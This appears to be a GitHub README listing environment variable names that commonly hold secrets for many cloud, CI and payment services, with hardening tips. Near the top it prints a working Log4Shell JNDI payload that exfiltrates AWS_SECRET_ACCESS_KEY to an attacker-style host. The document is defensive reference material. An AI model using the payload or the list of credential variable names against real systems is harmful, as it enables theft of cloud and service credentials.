Awesome list of secrets in environment variables
📝 Description
List of secrets, passwords, API keys, tokens stored inside a system environment variables.
An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.
Many developer documentations recommends storing secrets inside an environment variable, but is it the best way to keep secrets?
The attacker can read values inside system environment variable by using exploits:
-
CVE-2021-44228 JNDI log4j (JAVA) (Read more...)
${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
Get AWS_SECRET_ACCESS_KEY or return NO_EXISTS
-
CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on Github and Twitter
😉 -
and much more...
Because of that I created, a list of secrets in environment variables to help secure software.
Some of practices to avoid leak of secrets stored in environment variables is to:
- Block/notify on WAF when the request includes system environment variables
- Store in system environment variable path to a config file, instead of clean value
- Encrypt values inside environment variable
- Use different way to store secrets
🤓
You can check your system environment variables:
- Windows execute in PowerShell:
dir env:
- Linux/MacOS execute in terminal:
printenv
orenv
Awesome list of secrets in environment variables
A
AWS
- AWS_ACCESS_KEY_ID
- AWS_SECRET_ACCESS_KEY
- AMAZON_AWS_ACCESS_KEY_ID
- AMAZON_AWS_SECRET_ACCESS_KEY
source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html
Algolia
- ALGOLIA_API_KEY
source: https://www.algolia.com/doc/framework-integration/symfony/getting-started/installation/?client=php
Azure
- AZURE_CLIENT_ID
- AZURE_CLIENT_SECRET
- AZURE_USERNAME
- AZURE_PASSWORD
- MSI_ENDPOINT
- MSI_SECRET
source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet
source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406
B
Binance
- binance_api
- binance_secret
source: https://algotrading101.com/learn/binance-python-api-guide/
Bittrex
- BITTREX_API_KEY
- BITTREX_API_SECRET
source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md
C
Cloud Foundry
- CF_PASSWORD
- CF_USERNAME
source: https://cli.cloudfoundry.org/en-US/v6/auth.html
Code Climate
- CODECLIMATE_REPO_TOKEN
source: https://docs.codeclimate.com/docs/command-line-interface
Coveralls
- COVERALLS_REPO_TOKEN
source: https://docs.coveralls.io/supported-ci-services
CircleCI
- CIRCLE_TOKEN
source: https://circleci.com/docs/2.0/api-developers-guide/
D
Digitalocean
- DIGITALOCEAN_ACCESS_TOKEN
source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean
Dockerhub
- DOCKER_EMAIL
- DOCKER_PASSWORD
- DOCKER_USERNAME
source: https://github.com/marketplace/actions/publish-docker
Dockerhub
- DOCKERHUB_PASSWORD
source: https://circleci.com/docs/2.0/env-vars/
E
F
Fastlane products
- ITC_PASSWORD
source: https://github.com/phatblat/fastlane-variables
- FACEBOOK_APP_ID
- FACEBOOK_APP_SECRET
- FACEBOOK_ACCESS_TOKEN
Firebase
- FIREBASE_TOKEN
- FIREBASE_API_TOKEN
source: https://firebase.google.com/docs/cli
Fossa
- FOSSA_API_KEY
source: https://docs.fossa.com/docs/api-reference
G
Github
- GH_TOKEN
- GITHUB_TOKEN
- GH_ENTERPRISE_TOKEN
- GITHUB_ENTERPRISE_TOKEN
source: https://cli.github.com/manual/gh_help_environment
Gitlab
- CI_DEPLOY_PASSWORD
- CI_DEPLOY_USER
source: https://docs.gitlab.com/ee/user/project/deploy_tokens/
Google Cloud
- GOOGLE_APPLICATION_CREDENTIALS
- GOOGLE_API_KEY
source: https://cloud.google.com/docs/authentication/getting-started#windows
Gitlab
- CI_DEPLOY_USER
- CI_DEPLOY_PASSWORD
- GITLAB_USER_LOGIN
- CI_JOB_JWT
- CI_JOB_JWT_V2
- CI_JOB_TOKEN
source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html
H
Heroku
- HEROKU_API_KEY
- HEROKU_API_USER
source: https://devcenter.heroku.com/articles/authentication
I
J
K
L
M
Mailgun
- MAILGUN_API_KEY
source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/
MongoDB
- MCLI_PRIVATE_API_KEY
- MCLI_PUBLIC_API_KEY
https://docs.mongodb.com/mongocli/stable/configure/environment-variables/
N
NGROK
- NGROK_TOKEN
- NGROK_AUTH_TOKEN
source: -
NPM
- NPM_TOKEN
- NPM_AUTH_TOKEN
source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow
O
OKTA
- OKTA_CLIENT_ORGURL
- OKTA_CLIENT_TOKEN
- OKTA_OAUTH2_CLIENTSECRET
- OKTA_OAUTH2_CLIENTID
- OKTA_AUTHN_GROUPID
source: https://developer.okta.com/okta-sdk-java/apidocs/com/okta/sdk/client/ClientBuilder.html
Oracle OpenStack command-line client
- OS_USERNAME
- OS_PASSWORD
source: https://docs.openstack.org/ocata/user-guide/common/cli-set-environment-variables-using-openstack-rc.html
source: https://docs.oracle.com/cd/E78305_01/E78304/html/openstack-envars.html
P
Percy.io
- PERCY_TOKEN
source: https://docs.percy.io/docs/environment-variables
PostgreSQL
- POSTGRES_PASSWORD
source: https://www.postgresql.org/docs/current/libpq-envars.html
Q
R
S
Sauce Labs
- SAUCE_ACCESS_KEY
- SAUCE_USERNAME
source: https://docs.saucelabs.com/basics/environment-variables/
Sentry
- SENTRY_AUTH_TOKEN
source: https://docs.sentry.io/product/cli/configuration/
Slack
- SLACK_TOKEN
source: https://slack.dev/node-slack-sdk/getting-started
Square
- square_access_token
- square_oauth_secret
source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme
Stripe
- STRIPE_API_KEY
- STRIPE_DEVICE_NAME
source: https://stripe.com/docs/cli/api_keys
Surge
- SURGE_TOKEN
- SURGE_LOGIN
source: https://surge.sh/help/integrating-with-circleci
T
Twilio
- TWILIO_ACCOUNT_SID
- TWILIO_AUTH_TOKEN
Source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html
- CONSUMER_KEY
- CONSUMER_SECRET
source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices
Travis Ci
- TRAVIS_SUDO
- TRAVIS_OS_NAME
- TRAVIS_SECURE_ENV_VARS
source: https://docs.travis-ci.com/user/environment-variables
Telegram
- TELEGRAM_BOT_TOKEN
U
V
Vault HashiCorp
- VAULT_TOKEN
- VAULT_CLIENT_KEY
source: https://www.vaultproject.io/docs/commands
Vultr
- TOKEN
- VULTR_ACCESS
- VULTR_SECRET
source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops
W
X
Y
Z
Get a RAW list:
The repository includes the raw list:
It is auto-generated from README.md by GitHub action.
😎 Contributing
If you would like to add more secrets:
Please read and follow our Contributing guide
Thanks!
💻 Useful links
- Stackoverflow - Is it secure to store passwords as environment variables (rather than as plain text) in config files?
- Google - Best practices for securely using API keys
- An Introduction to Environment Variables and How to Use Them
- Why you shouldn't use ENV variables for secret data
- The Triumph and Tragedy of .env Files
🤝 Show your support
✔️ Disclaimer
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.